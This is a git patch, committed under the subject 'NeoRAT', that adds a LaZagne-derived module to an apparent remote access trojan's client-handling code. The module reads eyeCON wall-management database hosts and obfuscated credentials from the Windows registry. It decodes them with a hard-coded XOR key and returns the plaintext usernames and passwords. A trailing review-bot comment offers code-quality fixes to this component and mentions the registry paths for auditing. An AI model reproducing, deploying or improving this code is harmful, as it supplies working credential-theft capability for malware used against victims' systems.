From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/multimedia/__init__.py | 0
 .../lazagne/softwares/multimedia/eyecon.py | 98 ++++++++++++++++++++++
 2 files changed, 98 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/multimedia/__init__.py
 create mode 100644 foreign/client_handling/lazagne/softwares/multimedia/eyecon.py
(limited to 'foreign/client_handling/lazagne/softwares/multimedia')

diff --git a/foreign/client_handling/lazagne/softwares/multimedia/__init__.py b/foreign/client_handling/lazagne/softwares/multimedia/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/foreign/client_handling/lazagne/softwares/multimedia/eyecon.py b/foreign/client_handling/lazagne/softwares/multimedia/eyecon.py
new file mode 100644
index 0000000..1fa7a66
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/multimedia/eyecon.py
@@ -0,0 +1,98 @@
+# -*- coding: utf-8 -*-
+import codecs
+
+try:
+    import _winreg as winreg
+except ImportError:
+    import winreg
+
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import *
+
+
+class EyeCON(ModuleInfo):
+    """
+    eyeCON software WAll management software
+    infos at http://www.eyevis.de/en/products/wall-management-software.html
+    """
+    def __init__(self):
+        self.hex_key = [ 35, 231, 64, 111, 100, 72, 95, 65, 68, 51, 52, 70, 67, 51, 65, 95, 54, 55, 50, 48, 95, 49, 49,
+            68, 54, 95, 65, 48, 53, 50, 95, 48, 48, 48, 52, 55, 54, 65, 48, 70, 66, 53, 66, 65, 70, 88, 95, 76, 79, 71,
+            73, 49, 76, 115, 107, 100, 85, 108, 107, 106, 102, 100, 109, 32, 50, 102, 115, 100, 102, 102, 32, 102, 119,
+            115, 38, 78, 68, 76, 76, 95, 72, 95, 95, 0 ]
+        ModuleInfo.__init__(self, name='EyeCon', category='multimedia')
+
+    def deobfuscate(self, ciphered_str):
+        return b''.join([chr_or_byte(char_to_int(c) ^ k) for c, k in zip(codecs.decode(ciphered_str, 'hex'), self.hex_key)])
+
+    def get_db_hosts(self):
+        hosts = []
+        paths = (
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\WOW6432Node\\eyevis\\eyeDB', 'DB1'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\WOW6432Node\\eyevis\\eyeDB', 'DB2'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\WOW6432Node\\eyevis\\eyeDB', 'DB3'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\eyevis\\eyeDB', 'DB1'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\eyevis\\eyeDB', 'DB2'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\eyevis\\eyeDB', 'DB3'),
+        )
+        for path in paths:
+            try:
+                hkey = OpenKey(path[1], path[2])
+                reg_key = winreg.QueryValueEx(hkey, path[3])[0]
+                if reg_key:
+                    hosts += [reg_key]
+            except Exception:
+                # skipping if value doesn't exist
+                # self.debug(u'Problems with key:: {reg_key}'.format(reg_key=path[1]+path[2]))
+                pass
+        return hosts
+
+    def credentials_from_registry(self):
+        found_passwords = []
+        password_path = (
+            {
+                'app': 'EyeCON', 'reg_root': HKEY_LOCAL_MACHINE,
+                'reg_path': 'SOFTWARE\\WOW6432Node\\eyevis\\eyetool\\Default',
+                'user_key': 'registered', 'password_key': 'connection'
+            },
+            {
+                'app': 'EyeCON', 'reg_root': HKEY_LOCAL_MACHINE,
+                'reg_path': 'SOFTWARE\\eyevis\\eyetool\\Default',
+                'user_key': 'registered', 'password_key': 'connection'
+            },
+        )
+
+        for path in password_path:
+            values = {}
+            try:
+                try:
+                    hkey = OpenKey(path['reg_root'], path['reg_path'])
+                    reg_user_key = winreg.QueryValueEx(hkey, path['user_key'])[0]
+                    reg_password_key = winreg.QueryValueEx(hkey, path['password_key'])[0]
+                except Exception:
+                    self.debug(u'Problems with key:: {reg_key}'.format(reg_key=path['reg_root'] + path['reg_path']))
+                    continue
+
+                try:
+                    user = self.deobfuscate(reg_user_key)
+                except Exception:
+                    self.info(u'Problems with deobfuscate user : {reg_key}'.format(reg_key=path['reg_path']))
+                    continue
+
+                try:
+                    password = self.deobfuscate(reg_password_key)
+                except Exception:
+                    self.info(u'Problems with deobfuscate password : {reg_key}'.format(reg_key=path['reg_path']))
+                    continue
+
+                found_passwords.append({'username': user, 'password': password})
+            except Exception:
+                pass
+        return found_passwords
+
+    def run(self):
+        hosts = self.get_db_hosts()
+        credentials = self.credentials_from_registry()
+        for cred in credentials:
+            cred['host(s)'] = b', '.join(hosts)
+        return credentials
-- 
cgit v1.2.3
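Review bot: The registry handles returned by `OpenKey` in `get_db_hosts` and `credentials_from_registry` are never closed, so each iteration leaks a handle until garbage collection; if `OpenKey` is the `winreg` one re-exported by the star import it supports the context-manager protocol, so `with OpenKey(path[1], path[2]) as hkey:` (and the same in the second method) would release it deterministically, otherwise a `winreg.CloseKey(hkey)` in a `finally` is needed. In `credentials_from_registry` the outer `except Exception: pass` is also redundant — every inner failure already `continue`s — and it would silently hide any error from the `found_passwords.append` line, so it should be dropped along with the unused `values = {}`. The class docstring has a typo (`WAll`) and the commented-out `self.debug(...)` line in `get_db_hosts` is dead code that should be removed rather than kept as a comment. From a defender's point of view the hard-coded `HKLM\SOFTWARE\...\eyevis\eyeDB` and `eyevis\eyetool\Default` paths are the only on-host artifacts this module reads, which is where registry read-auditing would observe it.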